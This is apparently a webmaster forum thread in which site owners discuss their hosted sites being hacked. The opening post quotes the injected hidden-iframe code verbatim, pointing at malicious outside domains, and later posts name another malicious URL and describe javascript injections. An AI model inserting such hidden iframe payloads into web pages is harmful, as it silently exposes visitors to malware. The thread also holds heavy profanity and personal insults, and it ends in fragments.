Anyone else had their Webair sites hacked yesterday?
 

Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers. :321GFY

Just a head's up, check your sites. I've informed their registrar.

Had to submit 6 review requests to google as the sites have been royally fucked over.

Wow, thanks for the heads up. I recieved an email from them saying that they had to move my server due to a "PDU error", didn't think to check my sites though. Going to scan through them now.

Might also have to do with you and not the host.

Did you check your logs or talked to your host?

No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

thanks for the heads up. checking now

Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.

Why do people still use webair? They're like the new dreamhost.

That's a neat tool st0ned, thanks for that.

Yeah, I hear you Babaganoosh. I've just got so many domains, and it's a pain in the ass to source a load of new hosts that accept the kind of sites we make :1orglaugh. I already deal with 16 different hosts as it is :Oh crap

Awesome tool

Heard nothing back from webair in 8 hours.

Great support. Not.

Do you use some cms script or that were plain html pages?

Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

I never seen a host getting so much complaints on here as Webair. Yet people always use them. Dont cry about shit if host with Webair. You can expect shit.

"Fucking asshole hackers." I'd fucking bad admins! If there were better admin would have less hackers

Wow. Goes to show how much you know about web applications and scripting. :error

This is the first problem I've had with Webair in 6 years, so you're talking shit as usual Troll boy. I thought you'd been banned permanently once and for all Frank?

How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

webair is one of te few hosts i avoid like the plague, about 1 thread a week about them.

There are dozens of ways to gain access. They can hack a php or similar script running on your website. They can hack the server itself. They can hack the local network the server is located on. etc etc etc. Ten times out of ten it's a poorly written php script which is easily attacked to give the hacker access to the server files.

Seriously dude. Webmaster 101. You should know this shit already. Specially if you have your own dedi box.

Thanks for the info potter, but they are basic sites, just html, handwritten, nothing running on them. No scripts to exploit.

I'm not a server guy. I write sites, and expect whoever hosts them to fucking do their job and look after them. I don't expect to have to look after server security as well as know how to SEO a site to beat 40 million others to a #1 keyphrase.

:1orglaugh:1orglaugh:1orglaugh

hmm... somebody complained about a site I posted last night! Gonna double check now!

Yeah that was me. No virus but it just sucked.

Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.

lollllllllllllllll

Nope, mine box was fine and it is fine now too :2 cents:

You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files

Are you using AT3?

Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.

I am not with webair but had mine hacked yes. iframe but different code.

there are a shitload of exploits for most well known scripts people use

I had 5 boxes hit with a superlong javascript on hundereds of domains. Any clue what they javascript does other than fuck up your page?

Can either be a simple redirect or a trojan installer.

Its probally not the host. we had the same thing happen to us on one of our blogs and the guy who updates them had a virus. Only the blogs he updates got slammed

Duke

this is the first part of the pop you get from the virus that has infected webair servers.
ijabwif.com/cgi-bin

some boxes with norton catch the virus and some dont.
Webair is being VERY quiet about this for some reason.

All of my sites have been infected with a piece of js code on all the index files. The sites are on four different hosting accounts, the FTP passwords are not the same.

Yeah, basically i'm fubar. I'm expecting Google to take notice and ban the sites, and if that happens, well...

I don't quite understand how they got in on four different hosting accounts. Judging by the FTP logs, it seems it was some sort of script that inserted this code, because all files on all hosting accounts have been changed at the same exact time. 9.05.2009 - 12:24.

The hosts cleaned the sites, but a few days later, i've been hit again. It seems it is something on my PC that is causing this.

Your PC? Highly unlikely...

This is the first code that was injected on my sites: (decoded version)

The FTP logs:

HI


fucked shit